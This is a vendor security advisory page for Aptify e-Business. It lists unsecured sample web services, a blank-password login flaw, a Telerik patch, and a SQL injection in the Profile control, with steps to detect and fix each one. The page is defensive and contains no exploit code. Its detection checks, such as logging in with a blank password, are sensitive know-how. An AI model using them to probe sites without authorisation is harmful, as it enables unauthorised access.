This page lists known security vulnerabilities in Aptify e-Business that could apply to your installation. if you are using Aptify e-Business, please review the site for information on these possible vulnerabilities and how to address them:

The information on this page is cross-posted in Aptify's Freshdesk instance here: https://aptify.freshdesk.com/support/solutions/folders/6000232121

Security Alert: Remove Sample XML Web Services If Not Using Them

Date Updated: February 19, 2018

The starter sites for the ASP.NET version of Aptify e-Business (that is, e-Business versions 5.5.3 and earlier) include a set of sample XML Web Services that demonstrate how to interact with Aptify using SOAP-based Web Services.

These Web Services have no inherent security by default, so if they are active on your production site without modification from what is provided with the starter sites, an unauthorized user may be able to retrieve or update data in your Aptify system.

The Web Services are:

GetOrderInfo.asmx
GetProductListing.asmx
UpdatePerson.asmx

If these services and their corresponding vb code files exist on your system and you have not modified these Web Services in any way, you should remove them immediately from your production Web Server following the steps below.

Versions affected

These Web Services are included in the starter site for all versions of Aptify e-Business 5.0 and later (note that this alert is not applicable if using e-Business Apollo, which is e-Business 5.5.5 and later). If your Web site is based on the e-Business ASP.NET starter site or the Sitefinity starter site, then your Web site may be be vulnerable to unauthorized access.

How to tell if you are impacted

On your production e-Business web site, load your e-Business home page and add WebServices/UpdatePerson.asmx to your e-Business base URL (such as https://www.<<yourWebSiteHere>>/WebServices/UpdatePerson.asmx). If you see a Web Service definition screen like the one shown below, the sample Web Services are active on your Web site:

Possible location for the Web Services

Depending on where you have e-Business installed on your web server, you will need to locate the e-Business folder (typically found within the wwwroot sub-folder of the inetpub folder ~inetpub\wwwroot\eBusiness). Within the ebusiness folder, look for a sub-folder named WebServices.

If you are unsure of the folder or have renamed the folder, you can locate the appropriate files using the Internet Information Services (IIS) Manager:

Open IIS Manager.
Browse to your site in the console tree.
Right-click the site name and select Explore from the context menu.
This opens the site files in a Windows Explorer window. Find the folder named WebServices.

Steps to remove the Web Services

If your site has these Web Services available, follow these steps to remove them:

Browse to the WebServices folder in your e-Business site structure.
Select the files in the folder.
If you are using Sitefinity, do not select the AptifySitefinityIntegration.asmx file. e-Business uses this Web Service for the out-of-the-box Sitefinity integration so sites that use Sitefinity should leave this file in place.
Move the files to a new location on the computer, outside of the Web site structure (such as to a temp folder).
Test your site to confirm you can still login and access system functionality. No IIS reset is required.
If functionality fails because you were using those Web Services, return the files to the WebServices folder and contact Aptify Support for assistance.

Note that the Web Services also have corresponding vb files in the e-Business App_Code folder. You can remove those files as well, but note that removing these files will trigger an IIS reset so you should only do this at a time when you are comfortable restarting your Web site:

Browse to the App_Code folder in your e-Business site structure.
Move the following vb files that correspond to the sample Web Services to a new location on the computer, outside of the Web site structure (such as to a temp folder):
1. GetOrderInfo.asmx.vb
2. GetProductListing.asmx.vb
3. UpdatePerson.asmx.vb
Your site will recompile since the App_Code contents have changed. Test your site to confirm you can still login and access system functionality.
Please create a ticket to contact Aptify Support if you have any questions or concerns about this Security Alert.

Security Alert: Confirm that your site does not allow Web Users to Login with Blank Passwords

Date Updated: February 19, 2018

Certain e-Business sites may allow a Web User to login without providing a password.

This can occur when all of the following are true:

Your Web User passwords use the original two-way encryption methoology and not One Way Hash Encryption
Your login control is missing an update that prevents blank passwords
Your EBusinessLogin.dll in your e-Business site's Bin folder is not version 5.5.2.100, 5.5.3.100 or 5.5.5.1

Follow these steps to determine if this applies to your site:

Locate the user name for one of the Web Users on your e-Business site.
Browse to the login page of the production e-Business site.
Enter the user name from Step 1 and click the login button (while leaving the password field blank).

If the login is successful, review Hotfix RES-458 and Issue 23315 to update your site to prevent this situation. The hotfix package is ready for download on the Aptify FTP site in the Version50\APTIFY_555 folder. The file name is Hotfix RES-458 for Ebiz on Aptify 5.5.5 and 5.5.6.zip.

For reference, this hotfix package includes the previous Global hotfix release (APTIFY_EBIZ_552_553_ISSUE_23315_GLOBAL_HOTFIX.zip). Here is the original description of the problem from Issue 23315’s hotfix:

Currently in Aptify e-Business 5.5.2 and 5.5.3, there is a situation where an individual may be able to login to an e-Business site with a user account name without providing a password. This problem can occur under the following conditions:

Your e-Business installation was upgraded from a prior release to e-Business 5.5.2 or 5.5.3.
Your e-Business installation is not using one way hash encryption for Web Users passwords, but uses the pre-existing two way encryption. (One way hash encryption was introduced in e-Business 5.5.2.)
Your e-Business Login control was not updated with the changes made to the control between e-Business 5.5.1 and e-Business 5.5.2.

This hotfix provides an updated EbusinessLogin.dll (one for e-Business 5.5.2 and one for e-Business 5.5.3) that explicitly prevents attempts to login with no password under the conditions described above. In addition, this hotfix outlines additional changes to consider for your e-Business installation.

Contact Aptify Support if you have any questions about this alert.

Sitefinity Users: You May Need to Apply the Telerik.Web.UI.dll Patch from September 2017

Date Updated: February 19, 2018

In September 2017, Progress notified Sitefinity license holders of Security vulnerabilities identified in Sitefinity CMS and provided a patch to Telerik.Web.UI.dll to address the vulnerabilities.

If you are using Sitefinity version 5.x to 10.x and have not already applied the update, see this article for details:

https://knowledgebase.progress.com/articles/Article/resolving-security-vulnerability-cve-2017-9248?utm_medium=email&elqTrackId=f55cb8a5d6df47acac01f44de2c84bb5&elq=e2623f0e0e1d482a8dbcbc1dadcd3fad&elqaid=13200&elqat=1&elqCampaignId=14465

Please contact Aptify Support if you have any questions about this update with regard to Aptify e-Business. Otherwise, please contact Sitefinity if you have specific questions about the vulnerabilities.

Security Alert: SQL Injection Vulnerability in Profile Control

Date Updated: February 19, 2018

Aptify has identified a SQL injection vulnerability in the code behind for the baseline Profile control.

The lnkCheckAvailable_Click () function that checks if a username is available when creating a new user account runs a simple SQL query to check the database.

Aptify has made available a hotfix that updates the function to use a parameterized statement instead to prevent a possible SQL injection.

The hotfix includes steps for updating your version of the Profile control to modify the function. This is the preferred approach since many clients have modified the profile control based on their individual site requirements. For reference, the hotfix also includes updated e-Business 5.5.3 baseline versions of the Profile.ascx.vb file for the ASP.NET starter site (in the ASP.NET Profile Control folder) and for the Sitefinity starter site (in the Sitefinity Profile Control folder).

The hotfix is available on the Aptify FTP site in the Version50\eBusiness folder (filename: Hotfix RES-415 for e-Business 5.5.3.zip).

Browser not supported